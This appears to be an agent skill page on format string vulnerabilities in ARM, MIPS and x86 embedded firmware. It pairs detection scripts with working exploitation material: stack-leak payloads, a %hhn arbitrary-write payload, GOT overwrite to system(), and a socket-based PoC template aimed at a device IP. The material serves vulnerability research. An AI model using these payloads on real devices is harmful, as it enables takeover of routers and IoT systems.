tangjunyi23

format-string-exploitation

Format string vulnerability detection and exploitation in embedded firmware binaries, covering ARM, MIPS, and x86 architectures


Install

npx skillscat add tangjunyi23/iotagent/format-string-exploitation

Install via the SkillsCat registry.

SKILL.md

Format String Vulnerability Analysis

Overview

Format string vulnerabilities occur when user-controlled input is passed directly as the format argument to a printf-family function, so conversion specifiers in that input are interpreted: %x and %s read memory, and %n writes to it. In embedded systems these bugs are especially dangerous because ASLR, stack canaries, and other mitigations are typically absent.

Dangerous Function Identification

Target Functions

Function                        Library     Risk Level
printf(user_input)              libc        Critical
fprintf(fp, user_input)         libc        Critical
sprintf(buf, user_input)        libc        Critical
snprintf(buf, n, user_input)    libc        Critical
syslog(priority, user_input)    libc        Critical
vprintf(user_input, va)         libc        Critical
dprintf(fd, user_input)         libc        High
warn(user_input)                BSD libc    High
err(eval, user_input)           BSD libc    High
setproctitle(user_input)        BSD         High
custom_log(user_input)          vendor      High

Detection via Static Analysis

# List the format strings embedded in the binary.
# A literal format string is the safe case; this inventory mainly helps
# locate logging code and spot unusual specifiers such as %n.
strings firmware_binary | grep -n '%s\|%x\|%n\|%p\|%d'

# In disassembly: look for printf/sprintf calls where the format pointer
# is computed at run time rather than pointing into .rodata/.data

# Ghidra: cross-reference the printf-family functions and check the format argument
# If it comes from the stack or from a function parameter → likely vulnerable
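
The strings/grep inventory above can also be done in Python when the firmware image is already loaded in a script. The following is a minimal sketch, not a complete scanner: the function name find_format_strings, the specifier pattern, and the sample blob are illustrative assumptions, and the pattern is a heuristic that will produce some false positives (for example, text such as "100% sure").

```python
import re

# Conversion specifiers of interest; %n is rare in legitimate firmware strings.
SPEC_RE = re.compile(rb"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|z)?[sxpdn]")
# Runs of printable ASCII, similar to the `strings` tool (minimum length 4).
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")


def find_format_strings(data):
    """Return (offset, text) for each printable run containing a format specifier."""
    hits = []
    for m in PRINTABLE_RE.finditer(data):
        if SPEC_RE.search(m.group()):
            hits.append((m.start(), m.group().decode("ascii")))
    return hits


# Synthetic blob standing in for a firmware image (illustrative only).
blob = b"\x00\x01login ok\x00user=%s id=%d\x00\xff\xfeplain text\x00count: %n\x00"
for offset, text in find_format_strings(blob):
    print(hex(offset), text)
```

For a real image, pass the file contents instead, for example find_format_strings(open(path, "rb").read()). The offsets are file offsets, which still have to be mapped to load addresses before cross-referencing them in a disassembler.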

Automated Detection with Ghidra

# Ghidra Python script: list call sites of printf-family functions
# Uses str.format instead of f-strings so it also runs under Jython 2.7

PRINTF_FUNCS = set(["printf", "fprintf", "sprintf", "snprintf", "syslog",
                    "vprintf", "vsprintf", "vsnprintf", "dprintf",
                    "warn", "warnx", "err", "errx"])

fm = currentProgram.getFunctionManager()

for func in fm.getFunctions(True):
    # Exact-name match: substring matching would also flag strerror, perror, etc.
    name = func.getName().lstrip("_").lower()
    if name not in PRINTF_FUNCS:
        continue
    for ref in getReferencesTo(func.getEntryPoint()):
        if not ref.getReferenceType().isCall():
            continue  # skip data references such as pointer tables
        caller = getFunctionContaining(ref.getFromAddress())
        if caller:
            print("[!] {} called from {} @ {}".format(
                func.getName(), caller.getName(), ref.getFromAddress()))
            # TODO: Check if format argument is user-controlled

Exploitation Techniques

Information Disclosure

# Read stack values
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

# Direct parameter access (find offset where AAAA appears):
AAAA%1$08x  AAAA%2$08x  AAAA%3$08x  ...  AAAA%N$08x
# When output shows 41414141 → offset N is where input lands on stack

# Read arbitrary memory (once offset is known, e.g., N=7):
# Place target address at offset, use %s to dereference
# Write raw bytes: print() would re-encode bytes >= 0x80 (here 0xa0, 0x91) as UTF-8
python3 -c "import struct, sys; sys.stdout.buffer.write(struct.pack('<I', 0x080491a0) + b'%7\$s')"
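
Finding the offset by eye gets tedious with long responses. The sketch below parses the dotted output of an AAAA%08x.%08x... probe and reports which word holds the marker. The function name find_marker_offset and the sample response are assumptions made for illustration; the sample values are invented and do not come from a real target.

```python
def find_marker_offset(leak, marker=b"AAAA", byteorder="little"):
    """Return the 1-based index of the leaked word equal to `marker`, or None.

    `leak` is the text echoed back for an input such as AAAA%08x.%08x.%08x
    """
    want = "{:08x}".format(int.from_bytes(marker, byteorder))
    prefix = marker.decode("ascii")
    # Drop the echoed marker itself, then split the dotted hex words.
    body = leak[len(prefix):] if leak.startswith(prefix) else leak
    for index, word in enumerate(body.strip().split("."), start=1):
        if word.lower() == want:
            return index
    return None


# Made-up response for illustration; real values depend on the target.
sample = "AAAAbffff6a0.00000040.b7fc5580.00000000.00000001.b7fff918.41414141"
print(find_marker_offset(sample))
```

The byteorder parameter only matters for markers that are not palindromic: AAAA reads the same either way, while a marker such as ABCD appears as 44434241 on a little-endian target.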

Architecture-Specific Stack Layout

ARM (32-bit)

# Arguments 1-4 in R0-R3, remaining on stack
# Format string is typically R0 (printf) or R1 (fprintf/sprintf)
# Stack arguments start at offset where SP points

# Exploitation offset calculation (printf):
# R0 = format string pointer
# R1-R3 = first 3 format arguments (%1$ to %3$, from registers)
# Stack[0], Stack[1], ... = subsequent arguments (%4$ onward)
# Input buffer offset depends on the caller's frame layout
# Often seen around offset 4-12, but verify it on the target

MIPS (32-bit)

# Arguments 1-4 in $a0-$a3, remaining on stack
# Format string in $a0
# $a1-$a3 cover first 3 format specifiers
# Stack arguments at SP+16, SP+20, ...

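# The o32 calling convention reserves 16 bytes at the lowest addresses
# of the caller's frame (SP+0 to SP+15) as a home area for $a0-$a3
# A variadic callee such as printf spills $a1-$a3 there, so its arguments
# form one contiguous run and the 4th format argument sits at SP+16

# Note: MIPS has branch delay slots. If the write primitive is used to
# redirect execution into code-reuse gadgets, the instruction in each
# delay slot also executes and must be accounted for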

x86 (32-bit)

# All arguments on stack (cdecl), pushed right to left
# Stack layout on entry to printf, after the call pushes the return address:
# ESP+0:  return address
# ESP+4:  format string pointer
# ESP+8:  arg1 (first %x reads this)
# ESP+12: arg2
# ...
# Input buffer typically at offset 5-15 words from format string
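
The three layouts above can be summarized as a mapping from a direct-parameter index N (as in %N$x) to the place printf reads it from. This is a sketch under simplifying assumptions: a plain printf(fmt, ...) call, 32-bit targets, and every variadic argument occupying one 4-byte word. The helper name printf_arg_location is hypothetical.

```python
WORD = 4  # 32-bit targets only


def printf_arg_location(arch, n):
    """Where printf(fmt, ...) fetches variadic argument n (as in %n$x), n >= 1.

    Stack offsets are relative to the stack pointer at the call (ARM, MIPS o32)
    or on function entry, after the return address is pushed (x86 cdecl).
    """
    if n < 1:
        raise ValueError("argument index starts at 1")
    if arch == "arm":
        regs = ["r1", "r2", "r3"]        # r0 holds the format pointer
        return regs[n - 1] if n <= 3 else "sp+{}".format((n - 4) * WORD)
    if arch == "mips":
        regs = ["$a1", "$a2", "$a3"]     # $a0 holds the format pointer
        # Stack arguments follow the 16-byte home area for $a0-$a3.
        return regs[n - 1] if n <= 3 else "sp+{}".format(16 + (n - 4) * WORD)
    if arch == "x86":
        # esp+0 return address, esp+4 format pointer, esp+8 first argument.
        return "esp+{}".format(4 + n * WORD)
    raise ValueError("unknown architecture: " + arch)


for arch in ("arm", "mips", "x86"):
    print(arch, [printf_arg_location(arch, n) for n in range(1, 6)])
```

For fprintf, sprintf, or snprintf the format pointer moves to a later register, so fewer register slots remain for format arguments and the mapping shifts accordingly.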

Write Primitive (%n)

# %n stores the number of characters printed so far through the pointer
# taken from the corresponding argument slot
# Direct parameter: %N$n writes through the pointer at offset N

# Write arbitrary value strategy:
# 1. Place target address at known stack offset (e.g., offset 7)
# 2. Print exact number of characters needed
# 3. Use %n to write count to target address

# Example: write 0x41424344 to addr, assuming the payload starts at offset 7
# Little-endian byte order in memory: 44 43 42 41
# Split into four single-byte writes with %hhn; the running count wraps mod 256
python3 -c "
import struct, sys
addr = 0x080491a0
# Write 4 bytes using %hhn (1 byte at a time)
payload  = struct.pack('<I', addr)      # byte 0 -> offset 7
payload += struct.pack('<I', addr + 1)  # byte 1 -> offset 8
payload += struct.pack('<I', addr + 2)  # byte 2 -> offset 9
payload += struct.pack('<I', addr + 3)  # byte 3 -> offset 10
payload += b'%52c%7\$hhn'    # count 16+52 = 68 = 0x44
payload += b'%255c%8\$hhn'   # count 323 = 0x143, low byte 0x43
payload += b'%255c%9\$hhn'   # count 578 = 0x242, low byte 0x42
payload += b'%255c%10\$hhn'  # count 833 = 0x341, low byte 0x41
# Write raw bytes: print() would re-encode bytes >= 0x80 as UTF-8
sys.stdout.buffer.write(payload)
"

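The padding arithmetic for %hhn is easy to get wrong by hand, because each write depends on the running character count modulo 256. The sketch below computes the padding for four successive single-byte writes. The function name hhn_padding is hypothetical, and it assumes the four target addresses (16 bytes) are the only output printed before the first padding directive.

```python
import struct


def hhn_padding(value, already_printed, endian="<"):
    """Return [(byte_value, padding), ...] for four successive %hhn writes.

    `already_printed` is the character count before the first padding
    directive (for example 16 when four 4-byte addresses lead the payload).
    """
    plan = []
    count = already_printed
    # struct.pack yields the bytes in target memory order (addr, addr+1, ...).
    for byte_value in struct.pack(endian + "I", value):
        padding = (byte_value - count) % 256   # %hhn keeps only the low 8 bits
        plan.append((byte_value, padding))
        count += padding
    return plan


for byte_value, padding in hhn_padding(0x41424344, 16):
    print("byte 0x{:02x}: pad {}".format(byte_value, padding))
```

On a little-endian target the bytes of 0x41424344 descend (44, 43, 42, 41), so every write after the first needs 255 characters of padding to wrap the counter around. Passing endian=">" reverses the memory order for big-endian targets.
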
GOT Overwrite (No RELRO)

# Overwrite Global Offset Table entry to redirect function calls
# 1. Identify target function's GOT entry address
# 2. Use format string %n to write shellcode address / system() address

# In embedded Linux with no ASLR:
# objdump -R binary | grep printf    → GOT entry for printf
# Overwrite printf@GOT → system@plt
# Next printf(user_input) call becomes system(user_input)

# Embedded bare-metal:
# Overwrite function pointer in interrupt vector table
# Or overwrite callback function pointer in global config struct

Embedded-Specific Considerations

No ASLR Exploitation

# Many embedded devices ship without ASLR
# → Code, GOT, and heap addresses are fixed and predictable across runs
# → Stack addresses are stable too, though they shift with environment and arguments
# → A single exploitation attempt is often sufficient (no brute force needed)

# Verify ASLR status:
cat /proc/sys/kernel/randomize_va_space
# 0 = disabled (common in embedded)
# 1 = stack, mmap base, and shared libraries randomized
# 2 = as 1, plus the heap (brk)

Bare-Metal / RTOS Targets

# On bare-metal or RTOS without MMU:
# - No GOT/PLT (statically linked)
# - Target function pointers in RAM:
#   - ISR vector table (if in RAM)
#   - Callback function pointers in structs
#   - Timer callback pointers
#   - Network receive handler pointers

# Memory layout is fully predictable from binary analysis

Limited Output Channels

# When printf output goes to:
# - UART only → connect serial to read output
# - Syslog → read /var/log/messages remotely
# - Buffer in memory → extract via other vulnerabilities
# - Nowhere (void context) → blind format string

# Blind format string exploitation:
# 1. Use %n to write without needing output
# 2. Overwrite return address or function pointer
# 3. Redirect execution to attacker-controlled payload
# 4. Confirm success via side channel (timing, network behavior)

PoC Template

#!/usr/bin/env python3
"""Format String Exploit Template for Embedded Target"""
import struct
import socket

TARGET_IP = "192.168.1.1"
TARGET_PORT = 80  # or telnet/custom service port

# Architecture: set pack format
ARCH = "arm"  # arm | mips | x86
ENDIAN = "<"  # < little-endian, > big-endian
PACK_FMT = f"{ENDIAN}I"  # 32-bit word

# Step 1: Find format string offset
def find_offset():
    """Send format strings to discover input offset on stack."""
    for i in range(1, 32):
        payload = f"AAAA%{i}$08x"
        resp = send_payload(payload)
        if "41414141" in resp:
            print(f"[+] Input at offset: {i}")
            return i
    return None

# Step 2: Build write-what-where payload
def build_payload(target_addr: int, value: int, offset: int) -> bytes:
    """Build %hhn payload to write 'value' to 'target_addr'.

    Assumes the payload starts at stack offset 'offset' and that no
    target address contains a NUL byte (it would terminate the string).
    """
    payload = b""
    # Bytes in target memory order, so big-endian targets are handled too
    bytes_to_write = struct.pack(PACK_FMT, value)

    # Pack 4 target addresses
    for i in range(4):
        payload += struct.pack(PACK_FMT, target_addr + i)
    if b"\x00" in payload:
        raise ValueError("target address contains a NUL byte")

    written = len(payload)
    for i, byte_val in enumerate(bytes_to_write):
        pad = (byte_val - written) % 256
        if pad > 0:  # pad == 0 means the count is already correct
            payload += f"%{pad}c".encode()
        payload += f"%{offset + i}$hhn".encode()
        written = byte_val

    return payload

def send_payload(payload, timeout=5.0):
    """Send payload to target; adapt to the specific protocol."""
    # Adapt this for HTTP, Telnet, custom protocol, etc.
    data = payload.encode("latin1") if isinstance(payload, str) else payload
    with socket.create_connection((TARGET_IP, TARGET_PORT), timeout=timeout) as s:
        s.sendall(data)      # send() may transmit only part of the buffer
        resp = s.recv(4096)  # single read; loop here if replies are larger
    return resp.decode(errors='replace')

if __name__ == "__main__":
    offset = find_offset()
    if offset:
        print(f"[+] Building exploit for offset {offset}")
        # Example: overwrite GOT entry
        # payload = build_payload(GOT_ADDR, SYSTEM_ADDR, offset)
        # send_payload(payload)

Detection Checklist

  1. Static binaries: strings binary | grep -c '%'; a high count indicates heavy printf-family use, so review the printf xrefs
  2. Decompiled code — format argument sourced from function parameter, not string literal
  3. Network input paths — HTTP headers, SNMP community strings, MQTT topics, syslog messages
  4. Config file parsers — hostname, SSID, device name fields used in log messages
  5. Web interface — CGI parameters passed to system logging functions
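
Item 2 of the checklist can be partly automated on decompiler output. The sketch below flags printf-family calls whose format argument is not a string literal. It is a line-based heuristic under stated assumptions: each call fits on one line, the source is C-like text exported from a decompiler, and C character literals such as ',' are not handled. The names FORMAT_ARG_INDEX, split_args, and find_nonliteral_format_calls are hypothetical, and the sample source is invented.

```python
import re

# Position of the format parameter for each function (0-based).
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2,
                    "syslog": 1, "dprintf": 1}
CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")


def split_args(text):
    """Split call arguments on top-level commas, honouring quotes and parentheses."""
    args, current, depth, in_string = [], "", 0, False
    i = 0
    while i < len(text):
        ch = text[i]
        if in_string:
            current += ch
            if ch == "\\" and i + 1 < len(text):
                i += 1
                current += text[i]       # keep the escaped character verbatim
            elif ch == '"':
                in_string = False
        elif ch == ")" and depth == 0:
            break                         # closing parenthesis of the call itself
        elif ch == "," and depth == 0:
            args.append(current.strip())
            current = ""
        else:
            if ch == '"':
                in_string = True
            elif ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            current += ch
        i += 1
    args.append(current.strip())
    return args


def find_nonliteral_format_calls(source):
    """Return (line_number, function, format_argument) for suspicious calls."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in CALL_RE.finditer(line):
            args = split_args(line[m.end():])
            idx = FORMAT_ARG_INDEX[m.group(1)]
            arg = args[idx] if idx < len(args) else ""
            if arg and not arg.startswith('"'):
                findings.append((lineno, m.group(1), arg))
    return findings


# Invented decompiler-style source for illustration.
sample = '''
printf("hello %s\\n", name);
printf(user_buf);
syslog(LOG_INFO, msg);
snprintf(out, sizeof(out), "%d", n);
fprintf(stderr, get_msg(a, b));
'''
for finding in find_nonliteral_format_calls(sample):
    print(finding)
```

Each finding is only a candidate: the format argument still has to be traced back to one of the input paths in items 3 to 5 before the call can be considered exploitable.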